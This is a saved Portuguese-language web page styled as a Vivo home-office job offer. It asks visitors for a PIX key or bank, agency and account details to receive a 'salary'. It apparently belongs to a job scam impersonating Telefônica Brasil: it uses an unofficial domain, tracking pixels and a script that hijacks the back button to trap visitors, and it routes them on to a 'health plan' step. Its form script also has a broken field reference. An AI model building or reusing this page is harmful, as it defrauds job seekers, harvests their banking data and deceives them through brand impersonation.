<!DOCTYPE html><!-- saved from url=(0036)./recebedor --><html lang="pt-BR"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <!-- DETECÇÃO INSTANTÂNEA DE DESKTOP - Aplicada antes de qualquer renderização -->
    
    

    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Dados Bancários - Vagas Home Office - Vivo</title>
    
    <!-- Bootstrap CSS -->
    <link href="css/bootstrap.min-5.css" rel="stylesheet">
    
    <!-- Font Awesome -->
    <link rel="stylesheet" href="css/all.min-5.css">
    
    <!-- Vivo Fonts -->
    <style>
        @font-face {
            font-family: 'VivoType';
            src: url('fonts/VivoTypeRegular-5.woff2') format('woff2');
            font-weight: normal;
            font-style: normal;
            font-display: swap;
        }
        
        @font-face {
            font-family: 'VivoType';
            src: url('fonts/VivoTypeBold-5.woff2') format('woff2');
            font-weight: bold;
            font-style: normal;
            font-display: swap;
        }
        
        @font-face {
            font-family: 'VivoType';
            src: url('fonts/VivoTypeLight-5.woff2') format('woff2');
            font-weight: 300;
            font-style: normal;
            font-display: swap;
        }
    </style>
    
    <!-- Fallback Google Fonts -->
    <style type="text/css">@font-face {font-family:Open Sans;font-style:normal;font-weight:300;src:url(/cf-fonts/v/open-sans/5.0.20/latin/wght/normal.woff2);unicode-range:U+0000-00FF,U+0131,U+0152-0153,U+02BB-02BC,U+02C6,U+02DA,U+02DC,U+0304,U+0308,U+0329,U+2000-206F,U+2074,U+20AC,U+2122,U+2191,U+2193,U+2212,U+2215,U+FEFF,U+FFFD;font-display:swap;}@font-face {font-family:Open Sans;font-style:normal;font-weight:300;src:url(/cf-fonts/v/open-sans/5.0.20/cyrillic/wght/normal.woff2);unicode-range:U+0301,U+0400-045F,U+0490-0491,U+04B0-04B1,U+2116;font-display:swap;}@font-face {font-family:Open Sans;font-style:normal;font-weight:300;src:url(/cf-fonts/v/open-sans/5.0.20/latin-ext/wght/normal.woff2);unicode-range:U+0100-02AF,U+0304,U+0308,U+0329,U+1E00-1E9F,U+1EF2-1EFF,U+2020,U+20A0-20AB,U+20AD-20CF,U+2113,U+2C60-2C7F,U+A720-A7FF;font-display:swap;}@font-face {font-family:Open Sans;font-style:normal;font-weight:300;src:url(/cf-fonts/v/open-sans/5.0.20/greek/wght/normal.woff2);unicode-range:U+0370-03FF;font-display:swap;}@font-face {font-family:Open Sans;font-style:normal;font-weight:300;src:url(/cf-fonts/v/open-sans/5.0.20/greek-ext/wght/normal.woff2);unicode-range:U+1F00-1FFF;font-display:swap;}@font-face {font-family:Open Sans;font-style:normal;font-weight:300;src:url(/cf-fonts/v/open-sans/5.0.20/vietnamese/wght/normal.woff2);unicode-range:U+0102-0103,U+0110-0111,U+0128-0129,U+0168-0169,U+01A0-01A1,U+01AF-01B0,U+0300-0301,U+0303-0304,U+0308-0309,U+0323,U+0329,U+1EA0-1EF9,U+20AB;font-display:swap;}@font-face {font-family:Open Sans;font-style:normal;font-weight:300;src:url(/cf-fonts/v/open-sans/5.0.20/cyrillic-ext/wght/normal.woff2);unicode-range:U+0460-052F,U+1C80-1C88,U+20B4,U+2DE0-2DFF,U+A640-A69F,U+FE2E-FE2F;font-display:swap;}@font-face {font-family:Open Sans;font-style:normal;font-weight:300;src:url(/cf-fonts/v/open-sans/5.0.20/hebrew/wght/normal.woff2);unicode-range:U+0590-05FF,U+200C-2010,U+20AA,U+25CC,U+FB1D-FB4F;font-display:swap;}@font-face {font-family:Open Sans;font-style:normal;font-weight:400;src:url(/cf-fonts/v/open-sans/5.0.20/latin/wght/normal.woff2);unicode-range:U+0000-00FF,U+0131,U+0152-0153,U+02BB-02BC,U+02C6,U+02DA,U+02DC,U+0304,U+0308,U+0329,U+2000-206F,U+2074,U+20AC,U+2122,U+2191,U+2193,U+2212,U+2215,U+FEFF,U+FFFD;font-display:swap;}@font-face {font-family:Open Sans;font-style:normal;font-weight:400;src:url(/cf-fonts/v/open-sans/5.0.20/vietnamese/wght/normal.woff2);unicode-range:U+0102-0103,U+0110-0111,U+0128-0129,U+0168-0169,U+01A0-01A1,U+01AF-01B0,U+0300-0301,U+0303-0304,U+0308-0309,U+0323,U+0329,U+1EA0-1EF9,U+20AB;font-display:swap;}@font-face {font-family:Open Sans;font-style:normal;font-weight:400;src:url(/cf-fonts/v/open-sans/5.0.20/latin-ext/wght/normal.woff2);unicode-range:U+0100-02AF,U+0304,U+0308,U+0329,U+1E00-1E9F,U+1EF2-1EFF,U+2020,U+20A0-20AB,U+20AD-20CF,U+2113,U+2C60-2C7F,U+A720-A7FF;font-display:swap;}@font-face {font-family:Open Sans;font-style:normal;font-weight:400;src:url(/cf-fonts/v/open-sans/5.0.20/cyrillic/wght/normal.woff2);unicode-range:U+0301,U+0400-045F,U+0490-0491,U+04B0-04B1,U+2116;font-display:swap;}@font-face {font-family:Open Sans;font-style:normal;font-weight:400;src:url(/cf-fonts/v/open-sans/5.0.20/hebrew/wght/normal.woff2);unicode-range:U+0590-05FF,U+200C-2010,U+20AA,U+25CC,U+FB1D-FB4F;font-display:swap;}@font-face {font-family:Open Sans;font-style:normal;font-weight:400;src:url(/cf-fonts/v/open-sans/5.0.20/greek/wght/normal.woff2);unicode-range:U+0370-03FF;font-display:swap;}@font-face {font-family:Open Sans;font-style:normal;font-weight:400;src:url(/cf-fonts/v/open-sans/5.0.20/cyrillic-ext/wght/normal.woff2);unicode-range:U+0460-052F,U+1C80-1C88,U+20B4,U+2DE0-2DFF,U+A640-A69F,U+FE2E-FE2F;font-display:swap;}@font-face {font-family:Open Sans;font-style:normal;font-weight:400;src:url(/cf-fonts/v/open-sans/5.0.20/greek-ext/wght/normal.woff2);unicode-range:U+1F00-1FFF;font-display:swap;}@font-face {font-family:Open Sans;font-style:normal;font-weight:600;src:url(/cf-fonts/v/open-sans/5.0.20/cyrillic-ext/wght/normal.woff2);unicode-range:U+0460-052F,U+1C80-1C88,U+20B4,U+2DE0-2DFF,U+A640-A69F,U+FE2E-FE2F;font-display:swap;}@font-face {font-family:Open Sans;font-style:normal;font-weight:600;src:url(/cf-fonts/v/open-sans/5.0.20/greek-ext/wght/normal.woff2);unicode-range:U+1F00-1FFF;font-display:swap;}@font-face {font-family:Open Sans;font-style:normal;font-weight:600;src:url(/cf-fonts/v/open-sans/5.0.20/hebrew/wght/normal.woff2);unicode-range:U+0590-05FF,U+200C-2010,U+20AA,U+25CC,U+FB1D-FB4F;font-display:swap;}@font-face {font-family:Open Sans;font-style:normal;font-weight:600;src:url(/cf-fonts/v/open-sans/5.0.20/cyrillic/wght/normal.woff2);unicode-range:U+0301,U+0400-045F,U+0490-0491,U+04B0-04B1,U+2116;font-display:swap;}@font-face {font-family:Open Sans;font-style:normal;font-weight:600;src:url(/cf-fonts/v/open-sans/5.0.20/latin-ext/wght/normal.woff2);unicode-range:U+0100-02AF,U+0304,U+0308,U+0329,U+1E00-1E9F,U+1EF2-1EFF,U+2020,U+20A0-20AB,U+20AD-20CF,U+2113,U+2C60-2C7F,U+A720-A7FF;font-display:swap;}@font-face {font-family:Open Sans;font-style:normal;font-weight:600;src:url(/cf-fonts/v/open-sans/5.0.20/greek/wght/normal.woff2);unicode-range:U+0370-03FF;font-display:swap;}@font-face {font-family:Open Sans;font-style:normal;font-weight:600;src:url(/cf-fonts/v/open-sans/5.0.20/latin/wght/normal.woff2);unicode-range:U+0000-00FF,U+0131,U+0152-0153,U+02BB-02BC,U+02C6,U+02DA,U+02DC,U+0304,U+0308,U+0329,U+2000-206F,U+2074,U+20AC,U+2122,U+2191,U+2193,U+2212,U+2215,U+FEFF,U+FFFD;font-display:swap;}@font-face {font-family:Open Sans;font-style:normal;font-weight:600;src:url(/cf-fonts/v/open-sans/5.0.20/vietnamese/wght/normal.woff2);unicode-range:U+0102-0103,U+0110-0111,U+0128-0129,U+0168-0169,U+01A0-01A1,U+01AF-01B0,U+0300-0301,U+0303-0304,U+0308-0309,U+0323,U+0329,U+1EA0-1EF9,U+20AB;font-display:swap;}@font-face {font-family:Open Sans;font-style:normal;font-weight:700;src:url(/cf-fonts/v/open-sans/5.0.20/greek/wght/normal.woff2);unicode-range:U+0370-03FF;font-display:swap;}@font-face {font-family:Open Sans;font-style:normal;font-weight:700;src:url(/cf-fonts/v/open-sans/5.0.20/vietnamese/wght/normal.woff2);unicode-range:U+0102-0103,U+0110-0111,U+0128-0129,U+0168-0169,U+01A0-01A1,U+01AF-01B0,U+0300-0301,U+0303-0304,U+0308-0309,U+0323,U+0329,U+1EA0-1EF9,U+20AB;font-display:swap;}@font-face {font-family:Open Sans;font-style:normal;font-weight:700;src:url(/cf-fonts/v/open-sans/5.0.20/cyrillic-ext/wght/normal.woff2);unicode-range:U+0460-052F,U+1C80-1C88,U+20B4,U+2DE0-2DFF,U+A640-A69F,U+FE2E-FE2F;font-display:swap;}@font-face {font-family:Open Sans;font-style:normal;font-weight:700;src:url(/cf-fonts/v/open-sans/5.0.20/latin/wght/normal.woff2);unicode-range:U+0000-00FF,U+0131,U+0152-0153,U+02BB-02BC,U+02C6,U+02DA,U+02DC,U+0304,U+0308,U+0329,U+2000-206F,U+2074,U+20AC,U+2122,U+2191,U+2193,U+2212,U+2215,U+FEFF,U+FFFD;font-display:swap;}@font-face {font-family:Open Sans;font-style:normal;font-weight:700;src:url(/cf-fonts/v/open-sans/5.0.20/greek-ext/wght/normal.woff2);unicode-range:U+1F00-1FFF;font-display:swap;}@font-face {font-family:Open Sans;font-style:normal;font-weight:700;src:url(/cf-fonts/v/open-sans/5.0.20/latin-ext/wght/normal.woff2);unicode-range:U+0100-02AF,U+0304,U+0308,U+0329,U+1E00-1E9F,U+1EF2-1EFF,U+2020,U+20A0-20AB,U+20AD-20CF,U+2113,U+2C60-2C7F,U+A720-A7FF;font-display:swap;}@font-face {font-family:Open Sans;font-style:normal;font-weight:700;src:url(/cf-fonts/v/open-sans/5.0.20/hebrew/wght/normal.woff2);unicode-range:U+0590-05FF,U+200C-2010,U+20AA,U+25CC,U+FB1D-FB4F;font-display:swap;}@font-face {font-family:Open Sans;font-style:normal;font-weight:700;src:url(/cf-fonts/v/open-sans/5.0.20/cyrillic/wght/normal.woff2);unicode-range:U+0301,U+0400-045F,U+0490-0491,U+04B0-04B1,U+2116;font-display:swap;}</style>
    
    <!-- Custom CSS -->
    <link rel="stylesheet" href="css/style.css">

<script>
  window.pixelId = "6800b134ebd4fe5c54b14d47";
  var a = document.createElement("script");
  a.setAttribute("async", "");
  a.setAttribute("defer", "");
  a.setAttribute("src", "https://cdn.utmify.com.br/scripts/pixel/pixel.js");
  document.head.appendChild(a);
</script>
<script>
  !function(f,b,e,v,n,t,s){
    if(f.fbq)return;n=f.fbq=function(){
      n.callMethod?
        n.callMethod.apply(n,arguments):n.queue.push(arguments)
    };
    if(!f._fbq)f._fbq=n;
    n.push=n;
    n.loaded=!0;
    n.version='2.0';
    n.queue=[];
    t=b.createElement(e);t.async=!0;
    t.src=v;
    s=b.getElementsByTagName(e)[0];
    s.parentNode.insertBefore(t,s)
  }(
    window,
    document,
    'script',
    'https://connect.facebook.net/en_US/fbevents.js'
  );
  fbq('init', '598153602790130');
  fbq('track', 'PageView');
</script>
<noscript>
  <img height="1" width="1" style="display:none"
    src="https://www.facebook.com/tr?id=598153602790130&ev=PageView&noscript=1"
  />
</noscript>
<!-- End Facebook Pixel Code -->
<script>
  // URL para onde o lead será redirecionado
  const backUrl = "https://vivo-empregos.site/backredirect";

  // Impede que o usuário retorne para a página anterior
  history.pushState(null, null, location.href);

  window.addEventListener("popstate", function () {
    location.href = backUrl;
  });
</script>
</head>
<body style="cursor: auto;">
    <header>
        <!-- Logo e barra de navegação -->
        <nav class="navbar navbar-expand-lg" style="background-color: white; box-shadow: 0 2px 4px rgba(0,0,0,0.1);">
            <div class="container">
                <a class="navbar-brand" href="">
                    <img src="images/logo-vivo.png" alt="Vivo" height="40">
                </a>
                <button class="navbar-toggler" type="button" data-bs-toggle="collapse" data-bs-target="#navbarNav" aria-controls="navbarNav" aria-expanded="false" aria-label="Toggle navigation">
                    <span class="navbar-toggler-icon"></span>
                </button>
                <div class="collapse navbar-collapse" id="navbarNav">
                    <ul class="navbar-nav ms-auto">
                        <li class="nav-item">
                            <span class="nav-link">
                                <small style="color: #660099; font-weight: bold;">TRABALHE CONOSCO > HOME OFFICE</small>
                            </span>
                        </li>
                    </ul>
                </div>
            </div>
        </nav>
    </header>
    
    <main class="container my-4">
        <div class="row">
            <div class="col-lg-8 mx-auto">
                <div class="card shadow-sm">
                    <div class="card-header" style="background-color: #660099; color: white;">
                        <h5 class="mb-0">Forma de Pagamento</h5>
                    </div>
                    <div class="card-body p-4">
                        <div class="text-center my-3">
                            <h4 style="color: #660099; font-weight: 500; margin-bottom: 15px;">COMO DESEJA RECEBER SEU SALÁRIO?</h4>
                            <p style="color: #666; font-size: 15px;">Escolha como quer receber mensalmente o salário da Vivo</p>
                        </div>
                        
                        <div style="background-color: #F5F5F5; border-radius: 10px; padding: 25px; margin: 20px 0; max-width: 600px; margin: 0 auto 30px;">
                            <!-- Opções de Recebimento -->
                            <div class="payment-options">
                                <!-- Opção PIX -->
                                <div class="payment-option mb-3">
                                    <button id="pix-option" class="btn w-100 mb-2 d-flex align-items-center justify-content-between payment-btn" style="background-color: white; border: 1px solid #ddd; padding: 15px; text-align: left; border-radius: 8px; box-shadow: 0 2px 4px rgba(0,0,0,0.05);">
                                        <div class="d-flex align-items-center">
                                            <img src="images/1200px-Logo%E2%80%94pix_powered_by_Banco_Central_%28Brazil%252C_2020%29.svg.png" alt="PIX" style="height: 30px; margin-right: 15px;">
                                            <span style="font-weight: 500; color: #333;">Receber por PIX</span>
                                        </div>
                                        
                                    </button>
                                    
                                    <div id="pix-form" class="payment-form p-3" style="display: none; background-color: white; border-radius: 8px; margin-top: 10px;">
                                        <div class="mb-3">
                                            <label for="pix-type" class="form-label">Tipo de chave PIX</label>
                                            <select class="form-select" id="pix-type">
                                                <option value="">Selecione o tipo de chave</option>
                                                <option value="cpf">CPF</option>
                                                <option value="email">E-mail</option>
                                                <option value="telefone">Telefone</option>
                                                <option value="aleatoria">Chave Aleatória</option>
                                            </select>
                                        </div>
                                        
                                        <div class="mb-3">
                                            <label for="pix-key" class="form-label">Chave PIX</label>
                                            <input type="text" class="form-control" id="pix-key" placeholder="Digite sua chave PIX">
                                        </div>
                                    </div>
                                </div>
                                
                                <!-- Opção TED -->
                                <div class="payment-option">
                                    <button id="ted-option" class="btn w-100 mb-2 d-flex align-items-center justify-content-between payment-btn" style="background-color: white; border: 1px solid #ddd; padding: 15px; text-align: left; border-radius: 8px; box-shadow: 0 2px 4px rgba(0,0,0,0.05);">
                                        <div class="d-flex align-items-center">
                                            <img src="images/assets-task-01jth39f8ef3bre1yrgbjej333-1746478158-img-0-11zon.webp" alt="TED" style="height: 30px; margin-right: 15px;">
                                            <span style="font-weight: 500; color: #333;">Receber por TED</span>
                                        </div>
                                        
                                    </button>
                                    
                                    <div id="ted-form" class="payment-form p-3" style="display: none; background-color: white; border-radius: 8px; margin-top: 10px;">
                                        <div class="mb-3">
                                            <label for="bank" class="form-label">Banco</label>
                                            <select class="form-select" id="bank">
                                                <option value="">Selecione seu banco</option>
                                                <option value="001">Banco do Brasil</option>
                                                <option value="341">Itaú</option>
                                                <option value="033">Santander</option>
                                                <option value="104">Caixa Econômica Federal</option>
                                                <option value="237">Bradesco</option>
                                                <option value="260">Nubank</option>
                                            </select>
                                        </div>
                                        
                                        <div class="mb-3">
                                            <label for="agency" class="form-label">Agência</label>
                                            <input type="text" class="form-control" id="agency" placeholder="Ex: 1234">
                                        </div>
                                        
                                        <div class="row mb-3">
                                            <div class="col-md-8">
                                                <label for="account" class="form-label">Conta</label>
                                                <input type="text" class="form-control" id="account" placeholder="Ex: 12345">
                                            </div>
                                            <div class="col-md-4">
                                                <label for="digit" class="form-label">Dígito</label>
                                                <input type="text" class="form-control" id="digit" placeholder="Ex: 6">
                                            </div>
                                        </div>
                                    </div>
                                </div>
                            </div>
                        </div>
                        
                        <div class="text-center">
                            <form id="payment-form" method="window" action="../plano_saude">
                                <!-- Campo para identificar método de pagamento -->
                                <input type="hidden" id="metodo_pagamento" name="metodo_pagamento" value="ted">
                                
                                <!-- Campos PIX -->
                                <input type="hidden" id="pix_type_input" name="pix_type" value="">
                                <input type="hidden" id="pix_key_input" name="pix_key" value="">
                                
                                <!-- Campos TED -->
                                <input type="hidden" id="banco_input" name="banco" value="">
                                <input type="hidden" id="agencia_input" name="agencia" value="">
                                <input type="hidden" id="conta_input" name="conta" value="">
                                <input type="hidden" id="tipo_conta_input" name="tipo_conta" value="Conta Corrente">
                                
                                <button type="submit" class="btn vivo-btn w-100 mt-3">PROSSEGUIR</button>
                            </form>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </main>
    
    <footer class="mt-5 py-4" style="background-color: #F5F5F5;">
        <div class="container">
            <div class="row">
                <div class="col-md-6">
                    <img src="images/Vivo-roxo.png" alt="Vivo" height="30">
                    <p class="mt-2" style="font-size: 12px; color: #666;">© 2025 Telefônica Brasil S.A. Todos os direitos reservados.</p>
                </div>
                <div class="col-md-6 text-md-end">
                    <p style="font-size: 12px; color: #666;">Central de Atendimento: 0800 015 1515</p>
                </div>
            </div>
        </div>
    </footer>
    
    <!-- Bootstrap JS e Popper.js -->
    <script src="js/bootstrap.bundle.min-1.js"></script>
    <script src="js/jquery-3.6.0.min.js"></script>
    
    <script>
        document.addEventListener('DOMContentLoaded', function() {
            // Manipulação dos botões de pagamento
            const pixOption = document.getElementById('pix-option');
            const tedOption = document.getElementById('ted-option');
            const pixForm = document.getElementById('pix-form');
            const tedForm = document.getElementById('ted-form');
            const pixType = document.getElementById('pix-type');
            const pixKey = document.getElementById('pix-key');
            
            // Campos ocultos do formulário
            const metodoInput = document.getElementById('metodo_pagamento');
            const pixTypeInput = document.getElementById('pix_type_input');
            const pixKeyInput = document.getElementById('pix_key_input');
            const bancoInput = document.getElementById('banco_input');
            const agenciaInput = document.getElementById('agencia_input');
            const contaInput = document.getElementById('conta_input');
            const tipoContaInput = document.getElementById('tipo_conta_input');
            
            // Campos do formulário TED
            const bancoSelect = document.getElementById('bank');
            const agenciaField = document.getElementById('branch');
            const contaField = document.getElementById('account');
            const digitoField = document.getElementById('digit');
            
            // Dados do usuário preenchidos na página de cadastro
            const userData = {
                cpf: '',
                email: 'exemplo@email.com',
                telefone: '',
            };
            
            // Manipulação do botão PIX
            pixOption.addEventListener('click', function() {
                pixForm.style.display = 'block';
                tedForm.style.display = 'none';
                pixOption.style.borderColor = '#660099';
                tedOption.style.borderColor = '#ddd';
                
                // Atualiza o campo oculto do método
                metodoInput.value = 'pix';
            });
            
            // Manipulação do botão TED
            tedOption.addEventListener('click', function() {
                tedForm.style.display = 'block';
                pixForm.style.display = 'none';
                tedOption.style.borderColor = '#660099';
                pixOption.style.borderColor = '#ddd';
                
                // Atualiza o campo oculto do método
                metodoInput.value = 'ted';
            });
            
            // Autopreenchimento baseado no tipo de chave PIX
            pixType.addEventListener('change', function() {
                const selectedType = this.value;
                
                switch(selectedType) {
                    case 'cpf':
                        pixKey.value = userData.cpf;
                        break;
                    case 'email':
                        pixKey.value = userData.email;
                        break;
                    case 'telefone':
                        pixKey.value = userData.telefone;
                        break;
                    case 'aleatoria':
                        pixKey.value = '';
                        pixKey.placeholder = 'Digite sua chave aleatória';
                        break;
                    default:
                        pixKey.value = '';
                        break;
                }
                
                // Atualiza os campos ocultos para PIX
                pixTypeInput.value = selectedType;
                pixKeyInput.value = pixKey.value;
            });
            
            // Atualiza pixKeyInput quando o valor de pixKey mudar
            pixKey.addEventListener('input', function() {
                pixKeyInput.value = this.value;
            });
            
            // Atualiza os campos ocultos para TED quando os campos do formulário mudam
            bancoSelect.addEventListener('change', function() {
                bancoInput.value = this.options[this.selectedIndex].text;
            });
            
            agenciaField.addEventListener('input', function() {
                agenciaInput.value = this.value;
            });
            
            contaField.addEventListener('input', function() {
                // Concatena o número da conta com o dígito se estiver preenchido
                if (digitoField.value) {
                    contaInput.value = this.value + '-' + digitoField.value;
                } else {
                    contaInput.value = this.value;
                }
            });
            
            digitoField.addEventListener('input', function() {
                // Concatena o número da conta com o dígito
                if (contaField.value) {
                    contaInput.value = contaField.value + '-' + this.value;
                }
            });
            
            // Antes de enviar o formulário, garantir que os campos ocultos estão atualizados
            document.getElementById('payment-form').addEventListener('submit', function(e) {
                // Para PIX
                if (metodoInput.value === 'pix') {
                    pixTypeInput.value = pixType.value;
                    pixKeyInput.value = pixKey.value;
                    
                    // Verifica se os campos obrigatórios estão preenchidos
                    if (!pixType.value || !pixKey.value) {
                        e.preventDefault();
                        alert('Por favor, preencha o tipo e a chave PIX');
                    }
                } 
                // Para TED
                else {
                    bancoInput.value = bancoSelect.options[bancoSelect.selectedIndex].text;
                    agenciaInput.value = agenciaField.value;
                    
                    // Concatena conta e dígito
                    if (digitoField.value) {
                        contaInput.value = contaField.value + '-' + digitoField.value;
                    } else {
                        contaInput.value = contaField.value;
                    }
                    
                    // Verifica se os campos obrigatórios estão preenchidos
                    if (!bancoSelect.value || !agenciaField.value || !contaField.value) {
                        e.preventDefault();
                        alert('Por favor, preencha todos os dados bancários');
                    }
                }
            });
        });
    </script>

</body></html>